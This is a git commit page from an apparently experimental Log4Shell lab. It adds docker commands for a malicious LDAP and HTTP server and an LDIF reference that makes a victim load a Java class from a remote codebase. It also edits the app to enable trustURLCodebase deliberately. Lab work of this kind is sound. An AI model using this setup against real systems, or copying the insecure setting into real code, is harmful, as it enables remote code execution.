Browse Source

Added insecure java config

master
Ivan Ivanov 8 months ago
parent
commit
7cd1ed67b9
  1. 16
      attacker/README.md
  2. 9
      attacker/ldap/log4sh.ldif
  3. 2
      src/Main.kt

16
attacker/README.md

@ -1,16 +1,21 @@
# Attacker
Hosts an ldap with data from ldap/*.ldif files
An LDAP with data from ldap/*.ldif files
An HTTP server serving compiled .class files from .java files in ./src
Hosts an HTTP server serving built classes from files in ./src
You have to compile those files with
## Usage
Don't forget to
cd attacker
Compile your java payload
javac http/src/*.java -d /http/output/
## Usage
Build and run ldap
docker build ldap -t badldap
docker run --rm -d -p 1389:389 badldap
@ -28,4 +33,5 @@ Everything
docker kill `docker ps -f ancestor=badldap -f ancestor=badhttp --format "{{.Names}}"` 2> /dev/null; docker build ldap -t badldap; docker build http -t badhttp; docker run --rm -d -p 1389:389 badldap; docker run --rm -d -p 8088:3000 badhttp
Logs
for name in `docker ps -f ancestor=badldap -f ancestor=badhttp --format "{{.Names}}"`; do docker logs -f $name &; done

9
attacker/ldap/log4sh.ldif

@ -0,0 +1,9 @@
dn: cn=log4sh,dc=example,dc=org
cn: log4sh
javaClassName: patching
javaCodebase: http://172.17.0.1:8088/
javaFactory: Log4ShellHotpatch
objectClass: top
objectClass: javaContainer
objectClass: javaObject
objectClass: javaNamingReference

2
src/Main.kt

@ -7,6 +7,8 @@ val logger: Logger = LogManager.getLogger()
fun work(input: String)
{
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true")
logger.info(System.getProperty("com.sun.jndi.ldap.object.trustURLCodebase"))
logger.info("Working on {}", input)
}

Loading…
Cancel
Save